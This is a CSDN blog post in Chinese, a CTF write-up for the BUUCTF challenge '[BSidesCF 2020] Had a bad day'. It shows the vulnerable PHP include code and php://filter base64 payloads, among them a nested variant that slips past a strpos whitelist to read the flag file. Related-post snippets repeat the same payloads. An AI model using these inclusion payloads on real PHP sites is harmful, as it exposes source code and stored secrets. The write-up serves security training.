BUUCTF Web [BSidesCF 2020]Had a bad day1

最新推荐文章于 2024-04-26 23:16:19 发布
最新推荐文章于 2024-04-26 23:16:19 发布
阅读量187 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36831701/article/details/130756364
版权

打开burp 开始抓包

 这里说是文件与文件包含有关

传入参数woofers或者meowers会有一个文件包含

改一下这个参数试试

 这里提示包含文件失败

回显东西的题应该都和文件包含多多少少有关

所以直接试一试传入flag看看能不能把flag包含出来

通过报错信息可以看出,category参数会与.php拼接然后进行文件包含。

 这里回显定制信息,说明被过滤,应该是白名单

我们通过伪协议来获取index源代码试试

?category=php://filter/read=convert.base64-encode/resource=index

其中有这一部分

<?php
    $file = $_GET['category'];
 
    if(isset($file))
    {
        if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
            include ($file . '.php');
    }
    else{
        echo "Sorry, we currently only support woofers and meowers.";
        }
    }
?>

strpos函数只要传的参数里面有这几个就行

我们传入参数

?category=php://filter/read=convert.base64-encode/index/resource=flag

 

qq_36831701
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BSidesCF 2020]Had a bad day 1(伪协议嵌套)
weixin_45577185的博客
09-06 240
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
hada-p2
03-13
【标题】"hada-p2"可能是指一个项目或者软件的版本号,通常在软件开发中,"p2"可能是代表第二个主要版本或一个特定的迭代。在这个上下文中,我们推测"hada-p2"可能是一个基于C#语言的项目。 【描述】由于描述仅为...
[BSidesCF 2020]Had a bad day1
qq_63169208的博客
06-26 472
知识点:伪协议的嵌套点一下是两张图片,但是这里要注意你点图片时URL会传入变量尝试了一下模板注入发现不是,然后直接构造一句话木马发现也不行,但是当你在打开图片在传入的变量后面随便加上一个字母会发现自动加上了php尝试用伪协议打开一下index.php,但是php不用加因为会自动加base64解密一下,拿到php代码 可以看到变量中必须包含三个的其中一个,这时候就需要利用伪协议的嵌套了payload:/index.php?category=php://filter/read=convert.base64-
BUUCTF_[BSidesCF 2020]Had a bad day
最新发布
m_de_g的博客
04-26 557
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
[BSidesCF 2020]Had a bad day 1
weixin_44477223的博客
04-15 797
知识点 伪协议的嵌套 题目 解题 index页面没看出啥特别的,题目要我们点击选项 发现有参数可以尝试读取,多次尝试后发现需要去掉.php才能成功 category=php://filter/read=convert.base64-encode/resource=index 拿到源码,base64解码一下 <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compat
六年级英语上册 Unit 7 I had a bad day.第一课时教案 广东版开心.doc
10-13
小学教案
六年级英语上册 Unit 7 I had a bad day.第三课时教案 广东版开心.doc
10-13
小学教案
HADA protocol-开源
04-28
《HADA协议——开源软件在序列比对中的应用》 HADA协议,全称为Hierarchical Annotation Dependent Alignment,是一种用于序列比对的高效且灵活的方法。这个协议的开源实现为生物信息学研究提供了强大的工具,使得...
hada-p3
03-27
hada-p3
[CTF][BSidesCF 2020]Had a bad day 1--PHP伪协议
Gh0st_1n_The_Shell的博客
07-25 458
首先先打开主页,审查代码,并没有什么特别的地方 使用dirsearch,发现flag.php 打开什么都不显示 网页下又两个按钮,从源代码来看,会将两个属性–"woofers"和"meowers"通过get方法传递,通过修改属性发现网页不显示 当输入标点符号发现报错 使用了include函数,想到使用php伪协议 使用php://filter读取一些源代码 category=php://filter/read=convert.base64-encode/resource=index.php 报错,
[BSidesCF 2020]Had a bad day1 ~~不会编程的崽
不会编程的崽的博客
02-12 653
简单文件包含读取
[BSidesCF 2020]Had a bad day
qq_43801002的博客
08-03 1494
题目 过程 1.点击一个按钮,注意到url有点类似伪协议。用poc尝试一下读取index.php php://filter/read=convert.base64-encode/resource=index 出现base64,解码得源码。只放出有参考意义的片段。原来是后面做了拼接,所以前面的poc才不能加.php <?php   $file = $_GET['category'];      if(isset($file))   {     if( strpos( $file, "woofers"
[BSidesCF 2020]Had a bad day -wp
freerats的博客
08-06 286
发现有一个参数,考虑一下注入 加个’单引号发现报错 出现include(woofers’.php),怀疑有文件包含漏洞,用php协议读取一下内容 index.php?category=php://filter/read=convert.base64-encode/resource=index 看上面的报错可以知道,它在会帮参数自动添加.php,所以不需要自己加(加了后读不出东西,会报错,可以发现有两个php后缀,也可以发现问题) 转码一下 <?php $file = $_GET['catego.
1 package had stderr output
07-28
然而,关于"package had stderr output"的问题,我没有找到具体的引用内容来回答这个问题。请提供更多的信息或引用内容,以便我能够给出更准确的答案。 #### 引用[.reference_title] - *1* *2* *3* [ROS2 CmakeList...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值